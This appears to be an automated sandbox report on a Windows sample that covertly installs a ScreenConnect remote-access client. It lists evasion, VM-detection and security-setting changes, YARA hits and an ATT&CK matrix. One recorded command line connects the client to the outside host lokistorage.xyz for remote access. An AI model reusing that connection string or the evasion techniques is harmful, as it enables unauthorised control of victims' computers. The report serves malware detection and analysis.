Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Memory allocated: 1AC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Memory allocated: 3680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Memory allocated: 1B60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Memory allocated: 6D50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Memory allocated: 6430000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Memory allocated: 7D50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Memory allocated: 8D50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Memory allocated: 6D50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Memory allocated: 6D50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Memory allocated: 8FD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Memory allocated: 1510000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Memory allocated: 1BB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Memory allocated: 1B00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Memory allocated: 990000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Memory allocated: 1A2F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Memory allocated: DB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Memory allocated: 1AA40000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\ScreenConnect.InstallerActions.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI9148.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\Microsoft.Deployment.WindowsInstaller.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\Microsoft.Deployment.Compression.Cab.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI934C.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\Microsoft.Deployment.Compression.dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe TID: 7412	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe TID: 7896	Thread sleep count: 41 > 30	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe TID: 8060	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor

Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: ScreenConnect.ClientService.exe, 00000008.00000002.2689799825.0000000005190000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Anti Debugging

Enables debug privileges

Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe

Memory allocated: page read and write | page guard

.NET source code references suspicious native API functions

HIPS / PFW / Operating System Protection Evasion

Source: 0.2.tmpzNIZ0YQ.exe.1c00000.0.raw.unpack, Program.cs	Reference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
Source: 0.0.tmpzNIZ0YQ.exe.c363d4.2.raw.unpack, NativeLibrary.cs	Reference to suspicious API methods: LoadLibrary(type, assemblyTypeHint)
Source: 0.2.tmpzNIZ0YQ.exe.5bf0000.5.raw.unpack, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT \| WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
Source: 0.2.tmpzNIZ0YQ.exe.5bf0000.5.raw.unpack, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
Source: 0.2.tmpzNIZ0YQ.exe.5bf0000.5.raw.unpack, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
Source: 0.2.tmpzNIZ0YQ.exe.5bf0000.5.raw.unpack, WindowsExtensions.cs	Reference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown

Process created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (20ae101cef0f1acf)\screenconnect.clientservice.exe" "?e=access&y=guest&h=lokistorage.xyz&p=8041&s=f323c95d-8cdd-41df-ba61-316036d00b41&k=bgiaaackaabsu0exaagaaaeaaqchadx0vdcoypzw3rhl2%2fwsmdfp2rmcowlbz1ecggd2oi1gruiacwzcrkszxbywgdfgxdbyoegqdwtpmoqlg8jof4zkxvyt9zhvvqib5ire7%2frfo81g3%2b6hxkpjc0inqs%2bxruwq1z%2b6smxqscbb%2fykhdhw7ahbhyk65snb5ak02%2bpswsu904ncqii1vfx60s4cj8ilr9kifjwymgg0rdnakscv6gau5odsv8wz3cfurc2fznj8a0fkfb5xyik39fbiivzp4vyfarunnluqwccrm3hrkoohc9g96dlui6y4avh5vyzfnxeaixqvrlqzjtpadrhivwzf5sgoywqiok%2bc5&t=slawomirkowalski&c=pl&c=kuc&c=&c=&c=&c=&c=&c="

Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1491349532.00000000000D2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr	Binary or memory string: Progman
Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1491349532.00000000000D2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr	Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass

Language, Device and Operating System Detection

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\ScreenConnect.InstallerActions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe

Code function: 8_2_05853540 CreateNamedPipeW,

8_2_05853540

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe

Code function: 8_2_01514D30 RtlGetVersion,

8_2_01514D30

Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Modifies security policies related information

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\msiexec.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages

Yara detected ScreenConnect Tool

Remote Access Functionality

Source: Yara match	File source: tmpzNIZ0YQ.exe, type: SAMPLE
Source: Yara match	File source: 0.2.tmpzNIZ0YQ.exe.5ef0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.ScreenConnect.WindowsClient.exe.236fa10.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.tmpzNIZ0YQ.exe.5ef0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ScreenConnect.WindowsClient.exe.d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.tmpzNIZ0YQ.exe.ce518c.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.tmpzNIZ0YQ.exe.c363d4.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.tmpzNIZ0YQ.exe.cbb9d4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.ScreenConnect.WindowsClient.exe.2abfa50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.tmpzNIZ0YQ.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1418481996.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.1491349532.00000000000D2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2661733750.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1395919475.0000000000C36000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1544940596.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1410867618.0000000003681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tmpzNIZ0YQ.exe PID: 7392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 8040, type: MEMORYSTR
Source: Yara match	File source: C:\Config.Msi\418a04.rbs, type: DROPPED
Source: Yara match	File source: C:\Windows\Installer\MSI8E59.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	31 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	OS Credential Dumping	11 Peripheral Device Discovery	Remote Services	11 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	1 Replication Through Removable Media	1 Native API	1 DLL Search Order Hijacking	1 DLL Search Order Hijacking	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	1 Component Object Model Hijacking	1 Component Object Model Hijacking	1 Obfuscated Files or Information	Security Account Manager	45 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Valid Accounts	1 Valid Accounts	1 Software Packing	NTDS	21 Security Software Discovery	Distributed Component Object Model	Input Capture	1 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	2 Windows Service	1 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	1 Bootkit	2 Windows Service	1 DLL Search Order Hijacking	Cached Domain Credentials	51 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	13 Process Injection	1 File Deletion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	122 Masquerading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Valid Accounts	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
